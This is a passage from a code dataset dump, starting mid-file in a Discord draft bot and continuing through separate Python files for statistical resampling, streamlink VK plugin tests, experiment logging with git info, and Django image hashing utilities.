if message.author.id in CAPTAINS.keys():
await channel.send("Sorry, you are already in a draft. Exit with `!exit`")
return
# creating session and adding it to active sessions
session = DraftSession()
session.captain1 = message.author
CAPTAINS[session.captain1.id] = session.session_id
SESSIONS[session.session_id] = session
await channel.send(
"- SETTING UP DRAFT -\nShare Session ID with Opposing Captain\t>>>\t`" + str(session.session_id) + "`"
)
async def join_command(message: Message) -> None:
channel = message.author.dm_channel
split_message = message.content.split(' ')
# in the future discern from you existing in another draft and you joining your own draft
if message.author.id in CAPTAINS.keys():
await channel.send("Sorry, you are already in a draft. Exit with `!exit`")
return
if len(split_message) == 1:
await channel.send("You did not specify a draft id. Try `!join [draft id]`")
return
# check if valid session
if split_message[1] not in SESSIONS.keys():
await channel.send("Sorry, `" + split_message[1] + "` is not a valid draft id.")
return
session = SESSIONS[split_message[1]]
# prevent more than one person joining
if session.captain2:
await channel.send("Sorry, someone already joined " + split_message[1] + ".")
return
# put captain into the draft
session.captain2 = message.author
if session.captain1.id in CAPTAINS.keys():
CAPTAINS[session.captain2.id] = session.session_id
else:
CAPTAINS[session.captain1.id] = session.session_id
await start_draft(session)
async def start_draft(session: DraftSession) -> None:
session.update_table()
# delete history and message captains
await delete_dm_history(session)
await session.captain1.dm_channel.send("- STARTING DRAFT -", embed = session.table)
await session.captain1.dm_channel.send("Phase 1: Bans (Please ban with `!ban champ`)")
await session.captain2.dm_channel.send("- STARTING DRAFT -", embed = session.table)
await session.captain2.dm_channel.send("Phase 1: Bans (Please ban with `!ban champ`)")
# post draft to draft channel
draft_channel = client.get_channel(DRAFT_CHANNEL_ID)
temp_message = await draft_channel.send(embed = session.table)
session.draft_message_id = temp_message.id
async def pick_command(message: Message) -> None:
channel = message.author.dm_channel
draft_channel = client.get_channel(DRAFT_CHANNEL_ID)
split_message = message.content.split(' ')
command = split_message[0][1:]
if message.author.id not in CAPTAINS.keys():
await channel.send("Sorry, you are not currently in a draft. Try `!draft`")
return
session = SESSIONS[CAPTAINS[message.author.id]]
phase = "ban" if str(session.state)[-3:].lower() == "ban" else "pick"
# check if user input the correct command
if phase != command:
if phase == "ban":
await channel.send("Sorry, you are not currently picking. Try `!ban champ`")
else:
await channel.send("Sorry, you are not currently banning. Try `!pick champ`")
return
if len(split_message) == 1:
await channel.send("You did not specify a champ. Try `!" + phase + " champ`")
return
# pick
try:
session.pick(message.author.id, " ".join(split_message[1:]))
except NonexistantChampion:
await channel.send(" ".join(split_message[1:]) + " is not a valid champ")
return
except BannedChampion:
await channel.send(" ".join(split_message[1:]) + " is banned by the opposing captain")
return
except DuplicateChampion:
await channel.send(" ".join(split_message[1:]) + " is already picked")
return
except DuplicateBan:
await channel.send(" ".join(split_message[1:]) + " is already banned")
return
except LateBan:
await channel.send(" ".join(split_message[1:]) + " is picked by the opposing captain")
return
if not session.check_state():
await channel.send("Waiting for opposing captain's " + phase)
return
session.update_table()
session.advance_state()
next_phase = str(session.state)[11:].lower()
# check if draft is over
if next_phase == "complete":
session.table.color = 3210243
# update dms
await delete_dm_history(session)
await session.captain1.send(embed = session.table)
await session.captain2.send(embed = session.table)
# update draft-channel
async for msg in draft_channel.history():
if msg.embeds:
if msg.id == session.draft_message_id:
await msg.edit(embed = session.table)
break
# dm nailbot if it was a naildraft
misc_channel = client.get_channel(705836678891307089)
champ_picks = session.get_champ_picks()
if session.nail_draft:
await misc_channel.send(str(session.session_id) + ',' + ','.join(champ_picks))
else:
await misc_channel.send('0,' + ','.join(champ_picks))
await close_session(message)
return
if next_phase == "second_ban":
next_phase = next_phase + " (Please **ban** with `!ban champ`)"
else:
next_phase = next_phase + " (Please **pick** with `!pick champ`)"
await delete_dm_history(session)
await session.captain1.send(embed = session.table)
await session.captain1.send(next_phase)
await session.captain2.send(embed = session.table)
await session.captain2.send(next_phase)
# update draft-channel table
async for msg in draft_channel.history():
if msg.embeds:
if msg.id == session.draft_message_id:
await msg.edit(embed = session.table)
break
async def delete_dm_history(session):
if session.captain1:
async for hist_message in session.captain1.dm_channel.history():
if hist_message.author == client.user:
if hist_message.content[:6] != "```css" and not hist_message.embeds:
await hist_message.delete()
elif hist_message.embeds:
if hist_message.embeds[0].color.value != 3210243:
await hist_message.delete()
if session.captain2:
async for hist_message in session.captain2.dm_channel.history():
if hist_message.author == client.user:
if hist_message.content[:6] != "```css" and not hist_message.embeds:
await hist_message.delete()
elif hist_message.embeds:
if hist_message.embeds[0].color.value != 3210243:
await hist_message.delete()
async def close_session(message: Message) -> None:
session = SESSIONS[CAPTAINS[message.author.id]]
cap1 = None
cap2 = None
await delete_dm_history(session)
# remove other player
if session.captain1:
cap1 = session.captain1
if session.captain2:
cap2 = session.captain2
if CAPTAINS[message.author.id] in SESSIONS.keys():
del SESSIONS[CAPTAINS[message.author.id]]
if cap1:
await cap1.dm_channel.send("Exiting draft.")
del CAPTAINS[cap1.id]
if cap2:
await cap2.dm_channel.send("Exiting draft.")
del CAPTAINS[cap2.id]
async def exit_command(message: Message) -> None:
channel = message.author.dm_channel
if message.author.id not in CAPTAINS.keys():
await channel.send("You are not in a draft. Draft with `!draft`")
return
# delete draft table from draft-channel if session exists
if CAPTAINS[message.author.id] in SESSIONS.keys():
async for msg in client.get_channel(DRAFT_CHANNEL_ID).history():
if msg.id == SESSIONS[CAPTAINS[message.author.id]].draft_message_id:
await msg.delete()
break
await close_session(message)
async def nailbot(message: Message) -> None:
if not message.channel.id == DRAFT_CHANNEL_ID:
return
await message.delete()
split_message = message.content.split(' ')
guild = client.get_guild(GUILD)
captain1 = guild.get_member(int(split_message[1]))
captain2 = guild.get_member(int(split_message[2]))
session = DraftSession()
session.session_id = split_message[0]
session.nail_draft = True
session.captain1 = captain1
session.captain2 = captain2
CAPTAINS[session.captain1.id] = session.session_id
CAPTAINS[session.captain2.id] = session.session_id
SESSIONS[session.session_id] = session
if not captain1.dm_channel:
await captain1.create_dm()
if not captain2.dm_channel:
await captain2.create_dm()
await start_draft(session)
return
if __name__ == "__main__":
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
| StarcoderdataPython |
3230646 | <reponame>danieldeutsch/nlpstats<gh_stars>0
import numpy as np
import numpy.typing as npt
from typing import Callable, List, Sequence, Tuple, Union
def _resample_systems(matrices: List[np.ndarray], **kwargs) -> List[np.ndarray]:
_resample_systems_iv(matrices)
m = matrices[0].shape[0]
rows = np.random.choice(m, m, replace=True)
return [matrix[rows] for matrix in matrices]
def _resample_systems_iv(matrices: List[np.ndarray]) -> None:
m = matrices[0].shape[0]
for matrix in matrices:
if matrix.shape[0] != m:
raise ValueError("Input `matrices` all must have the same number of rows")
def _resample_inputs(
matrices: List[np.ndarray], paired_inputs: bool
) -> List[np.ndarray]:
_resample_inputs_iv(matrices, paired_inputs)
if paired_inputs:
n = matrices[0].shape[1]
cols = np.random.choice(n, n, replace=True)
return [matrix[:, cols] for matrix in matrices]
else:
resamples = []
for matrix in matrices:
n = matrix.shape[1]
cols = np.random.choice(n, n, replace=True)
resamples.append(matrix[:, cols])
return resamples
def _resample_inputs_iv(matrices: List[np.ndarray], paired_inputs: bool) -> None:
if paired_inputs:
n = matrices[0].shape[1]
for matrix in matrices:
if matrix.shape[1] != n:
raise ValueError(
"Input `matrices` all must have the same number of columns"
)
def _resample_both(matrices: List[np.ndarray], paired_inputs: bool) -> List[np.ndarray]:
_resample_both_iv(matrices, paired_inputs)
matrices = _resample_systems(matrices)
return _resample_inputs(matrices, paired_inputs)
def _resample_both_iv(matrices: List[np.ndarray], paired_inputs: bool) -> None:
_resample_systems_iv(matrices)
_resample_inputs_iv(matrices, paired_inputs)
def resample(
matrices: Union[npt.ArrayLike, Sequence[npt.ArrayLike]],
resampling_method: Union[Callable, str],
paired_inputs: bool = True,
) -> Union[np.ndarray, Tuple[np.ndarray, ...]]:
matrices, resampling_method = _resample_iv(matrices, resampling_method)
resamples = resampling_method(matrices, paired_inputs=paired_inputs)
if len(resamples) == 1:
return resamples[0]
return tuple(resamples)
def _resample_iv(
matrices: Union[npt.ArrayLike, Sequence[npt.ArrayLike]],
resampling_method: Union[Callable, str],
) -> Tuple[Sequence[np.ndarray], Callable]:
# If the input is just one matrix, wrap it into a list
if isinstance(matrices, np.ndarray):
matrices = [matrices]
# Ensure all are numpy arrays
for matrix in matrices:
if not isinstance(matrix, np.ndarray):
raise TypeError(f"Input `matrices` must all be of type `np.ndarray`")
if isinstance(resampling_method, str):
if resampling_method == "systems":
resampling_method = _resample_systems
elif resampling_method == "inputs":
resampling_method = _resample_inputs
elif resampling_method == "both":
resampling_method = _resample_both
else:
raise ValueError(f"Unknown resampling method: {resampling_method}")
return matrices, resampling_method
def _permutation_iv(X: np.ndarray, Y: np.ndarray):
if X.ndim != 2:
raise ValueError(f"`X` must be two-dimensional")
if Y.ndim != 2:
raise ValueError(f"`Y` must be two-dimensional")
if X.shape != Y.shape:
raise ValueError(f"`X` and `Y` must be the same shape")
def _permute_systems(X: np.ndarray, Y: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
_permutation_iv(X, Y)
# Do not modify the original matrices
X_p = X.copy()
Y_p = Y.copy()
m = X.shape[0]
mask = (np.random.rand(m, 1) > 0.5).reshape((m,))
X_p[mask] = Y[mask]
Y_p[mask] = X[mask]
return X_p, Y_p
def _permute_inputs(X: np.ndarray, Y: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
_permutation_iv(X, Y)
# Do not modify the original matrices
X_p = X.copy()
Y_p = Y.copy()
n = X.shape[1]
mask = (np.random.rand(1, n) > 0.5).reshape((n,))
X_p[:, mask] = Y[:, mask]
Y_p[:, mask] = X[:, mask]
return X_p, Y_p
def _permute_both(X: np.ndarray, Y: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
X, Y = _permute_systems(X, Y)
return _permute_inputs(X, Y)
def _permute_iv(
X: npt.ArrayLike, Y: npt.ArrayLike, permutation_method: str
) -> Tuple[np.ndarray, np.ndarray, Callable]:
X = np.asarray(X)
Y = np.asarray(Y)
if isinstance(permutation_method, str):
if permutation_method == "systems":
permutation_method = _permute_systems
elif permutation_method == "inputs":
permutation_method = _permute_inputs
elif permutation_method == "both":
permutation_method = _permute_both
else:
raise ValueError(f"Unknown permutation method: {permutation_method}")
return X, Y, permutation_method
def permute(
X: npt.ArrayLike, Y: npt.ArrayLike, permutation_method: str
) -> Tuple[np.ndarray, np.ndarray]:
X, Y, permutation_method = _permute_iv(X, Y, permutation_method)
return permutation_method(X, Y)
| StarcoderdataPython |
3288879 | <reponame>eleeeeeee/abc<filename>tests/test_plugin_vk.py
import unittest
from streamlink.plugins.vk import VK
class TestPluginVK(unittest.TestCase):
def test_follow_vk_redirect(self):
# should redirect
self.assertEqual(VK.follow_vk_redirect(
"https://vk.com/videos-24136539?z=video-24136539_456241176%2Fclub24136539%2Fpl_-24136539_-2"),
"https://vk.com/video-24136539_456241176"
)
self.assertEqual(VK.follow_vk_redirect(
"https://vk.com/videos-24136539?z=video-24136539_456241181%2Fpl_-24136539_-2"),
"https://vk.com/video-24136539_456241181"
)
# shouldn't redirect
self.assertEqual(VK.follow_vk_redirect("http://vk.com/"), "http://vk.com/")
self.assertEqual(VK.follow_vk_redirect("http://vk.com/videos-24136539"), "http://vk.com/videos-24136539")
self.assertEqual(VK.follow_vk_redirect("http://www.youtube.com/"), "http://www.youtube.com/")
def test_can_handle_url(self):
# should match
self.assertTrue(VK.can_handle_url("https://vk.com/video-9944999_456239622"))
self.assertTrue(VK.can_handle_url("http://vk.com/video-24136539_456239830"))
self.assertTrue(VK.can_handle_url("https://www.vk.com/video-34453259_456240574"))
self.assertTrue(VK.can_handle_url("https://vk.com/videos-24136539?z=video-24136539_456241155%2Fpl_-24136539_-2"))
# shouldn't match
self.assertFalse(VK.can_handle_url("https://vk.com/"))
self.assertFalse(VK.can_handle_url("https://vk.com/restore"))
self.assertFalse(VK.can_handle_url("https://www.vk.com/videos-24136539"))
self.assertFalse(VK.can_handle_url("http://vk.com/videos-24136539"))
self.assertFalse(VK.can_handle_url("http://www.youtube.com/"))
| StarcoderdataPython |
3369091 | import json
import os.path as osp
from collections import namedtuple, OrderedDict, defaultdict
from enum import Enum
from numbers import Number
import numpy as np
GitInfo = namedtuple(
'GitInfo',
[
'directory',
'code_diff',
'code_diff_staged',
'commit_hash',
'branch_name',
],
)
def save_git_info(logdir):
git_infos = get_git_info()
if git_infos is not None:
for (
directory, code_diff, code_diff_staged, commit_hash, branch_name
) in git_infos:
if directory[-1] == '/':
diff_file_name = directory[1:-1].replace("/", "-") + ".patch"
diff_staged_file_name = (
directory[1:-1].replace("/", "-") + "_staged.patch"
)
else:
diff_file_name = directory[1:].replace("/", "-") + ".patch"
diff_staged_file_name = (
directory[1:].replace("/", "-") + "_staged.patch"
)
if code_diff is not None and len(code_diff) > 0:
with open(osp.join(logdir, diff_file_name), "w") as f:
f.write(code_diff + '\n')
if code_diff_staged is not None and len(code_diff_staged) > 0:
with open(osp.join(logdir, diff_staged_file_name), "w") as f:
f.write(code_diff_staged + '\n')
with open(osp.join(logdir, "git_infos.txt"), "a") as f:
f.write("directory: {}".format(directory))
f.write('\n')
f.write("git hash: {}".format(commit_hash))
f.write('\n')
f.write("git branch name: {}".format(branch_name))
f.write('\n\n')
def get_git_info():
try:
import git
dirs = [
'/home/vitchyr/git/handful-of-trials/',
'/home/vitchyr/git/multiworld/',
]
git_infos = []
for directory in dirs:
# Idk how to query these things, so I'm just doing try-catch
try:
repo = git.Repo(directory)
try:
branch_name = repo.active_branch.name
except TypeError:
branch_name = '[DETACHED]'
git_infos.append(GitInfo(
directory=directory,
code_diff=repo.git.diff(None),
code_diff_staged=repo.git.diff('--staged'),
commit_hash=repo.head.commit.hexsha,
branch_name=branch_name,
))
except git.exc.InvalidGitRepositoryError:
pass
except ImportError:
git_infos = None
return git_infos
class MyEncoder(json.JSONEncoder):
def default(self, o):
if isinstance(o, type):
return {'$class': o.__module__ + "." + o.__name__}
elif isinstance(o, Enum):
return {
'$enum': o.__module__ + "." + o.__class__.__name__ + '.' + o.name
}
elif callable(o):
return {
'$function': o.__module__ + "." + o.__name__
}
try:
return json.JSONEncoder.default(self, o)
except TypeError as e:
if isinstance(o, object):
return {
'$object': str(o)
}
else:
raise e
def get_generic_path_information(paths, stat_prefix=''):
"""
Get an OrderedDict with a bunch of statistic names and values.
"""
statistics = OrderedDict()
if len(paths) == 0:
return statistics
returns = [sum(path["rewards"]) for path in paths]
rewards = np.vstack([path["rewards"] for path in paths])
statistics.update(create_stats_ordered_dict('Rewards', rewards,
stat_prefix=stat_prefix))
statistics.update(create_stats_ordered_dict('Returns', returns,
stat_prefix=stat_prefix))
actions = [path["ac"] for path in paths]
if len(actions[0].shape) == 1:
actions = np.hstack([path["ac"] for path in paths])
else:
actions = np.vstack([path["ac"] for path in paths])
statistics.update(create_stats_ordered_dict(
'Actions', actions, stat_prefix=stat_prefix
))
statistics[stat_prefix + 'Num Paths'] = len(paths)
for info_key in ['env_infos']:
if info_key in paths[0]:
all_env_infos = [
list_of_dicts__to__dict_of_lists(p[info_key])
for p in paths
]
for k in all_env_infos[0].keys():
final_ks = np.array([info[k][-1] for info in all_env_infos])
first_ks = np.array([info[k][0] for info in all_env_infos])
all_ks = np.concatenate([info[k] for info in all_env_infos])
statistics.update(create_stats_ordered_dict(
stat_prefix + k,
final_ks,
stat_prefix='{}/final/'.format(info_key),
))
statistics.update(create_stats_ordered_dict(
stat_prefix + k,
first_ks,
stat_prefix='{}/initial/'.format(info_key),
))
statistics.update(create_stats_ordered_dict(
stat_prefix + k,
all_ks,
stat_prefix='{}/'.format(info_key),
))
return statistics
def create_stats_ordered_dict(
name,
data,
stat_prefix=None,
always_show_all_stats=True,
exclude_max_min=False,
):
if stat_prefix is not None:
name = "{}{}".format(stat_prefix, name)
if isinstance(data, Number):
return OrderedDict({name: data})
if len(data) == 0:
return OrderedDict()
if isinstance(data, tuple):
ordered_dict = OrderedDict()
for number, d in enumerate(data):
sub_dict = create_stats_ordered_dict(
"{0}_{1}".format(name, number),
d,
)
ordered_dict.update(sub_dict)
return ordered_dict
if isinstance(data, list):
try:
iter(data[0])
except TypeError:
pass
else:
data = np.concatenate(data)
if (isinstance(data, np.ndarray) and data.size == 1
and not always_show_all_stats):
return OrderedDict({name: float(data)})
stats = OrderedDict([
(name + ' Mean', np.mean(data)),
(name + ' Std', np.std(data)),
])
if not exclude_max_min:
stats[name + ' Max'] = np.max(data).astype(np.float32)
stats[name + ' Min'] = np.min(data).astype(np.float32)
return stats
def list_of_dicts__to__dict_of_lists(lst):
"""
```
x = [
{'foo': 3, 'bar': 1},
{'foo': 4, 'bar': 2},
{'foo': 5, 'bar': 3},
]
ppp.list_of_dicts__to__dict_of_lists(x)
# Output:
# {'foo': [3, 4, 5], 'bar': [1, 2, 3]}
```
"""
if len(lst) == 0:
return {}
keys = lst[0].keys()
output_dict = defaultdict(list)
for d in lst:
assert set(d.keys()) == set(keys)
for k in keys:
output_dict[k].append(d[k])
return output_dict
| StarcoderdataPython |
144342 | <gh_stars>10-100
import base64
import hashlib
from io import BytesIO
import logging
from pathlib import Path
from typing import Dict, Union
import PIL
from django.core.files import File as DjangoFile
import imagehash
try:
from storages.backends.s3boto3 import S3Boto3StorageFile as BotoFile
except ImportError:
BotoFile = type('BotoFileFallbackClass', (), {})
logger = logging.getLogger(__name__)
Fileish = Union[str, bytes, Path, DjangoFile]
FINGERPRINT_SIZE = 16
def image_from_fingerprint(fingerprint):
"""Create tiny fingerprint image from 11x11 b64 encoded string
for image hash comparisons"""
data = base64.b64decode(fingerprint)
size = int(len(data)**0.5)
return PIL.Image.frombytes('L', (size, size), data)
def image_to_fingerprint(image, size=FINGERPRINT_SIZE):
"""Create b64encoded image signature for image hash comparisons"""
data = image.copy().convert('L').resize((size, size)).getdata()
return base64.b64encode(bytes(data)).decode()
def read_data(value: Fileish) -> bytes:
"""Read raw data from Fileish like object"""
if isinstance(value, str):
return Path(value).read_bytes()
elif isinstance(value, bytes):
return value
elif isinstance(value, Path):
return value.read_bytes()
elif isinstance(value, DjangoFile):
value.open('rb')
return value.read()
else:
# try:
# value.seek(0)
# except AttributeError:
# pass
return value.read()
# elif isinstance(value, BotoFile):
# return value.read()
def pil_image(fp: Fileish) -> PIL.Image.Image:
if isinstance(fp, PIL.Image.Image):
return fp
blob = BytesIO(read_data(fp))
return PIL.Image.open(blob)
def valid_image(fp: Fileish) -> bool:
try:
pil_image(fp).verify()
return True
except (SyntaxError, OSError, RuntimeError, ValueError, TypeError) as e:
return False
def get_md5(fp: Fileish) -> str:
"""Hexadecimal md5 hash of a Fileish stored on local disk"""
hasher = hashlib.md5(read_data(fp))
return hasher.hexdigest()
def get_mtime(file: Union[Path, str]) -> int:
"""Modification time"""
return int(Path(file).stat().st_mtime)
def get_filesize(fp: Fileish) -> int:
"""Get file size in bytes"""
if isinstance(fp, Path):
return fp.stat().st_size
else:
return len(read_data(fp))
def get_imagehashes(fp: Fileish,
size=FINGERPRINT_SIZE) -> Dict[str, imagehash.ImageHash]:
"""Calculate perceptual hashes for comparison of identical images"""
try:
img = pil_image(fp)
thumb = img.resize((size, size), PIL.Image.BILINEAR).convert('L')
return dict(
ahash=imagehash.average_hash(thumb),
phash=imagehash.phash(thumb),
whash=imagehash.whash(thumb),
dhash=imagehash.dhash(thumb),
)
except OSError: # corrupt image file probably
return {}
def get_exif(fp: Fileish) -> dict:
try:
return pil_image(fp)._getexif() or {}
except (AttributeError, OSError):
pass # file format has no exif.
except Exception: # unexpected error
logger.exception('Cannot extract exif data')
return {}
def get_mimetype(fp: Fileish) -> str:
return PIL.Image.MIME.get(pil_image(fp).format)
def s3_md5(s3key):
"""Hexadecimal md5 hash of a Fileish stored in Amazon S3"""
return s3key.etag.strip('"').strip("'")
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.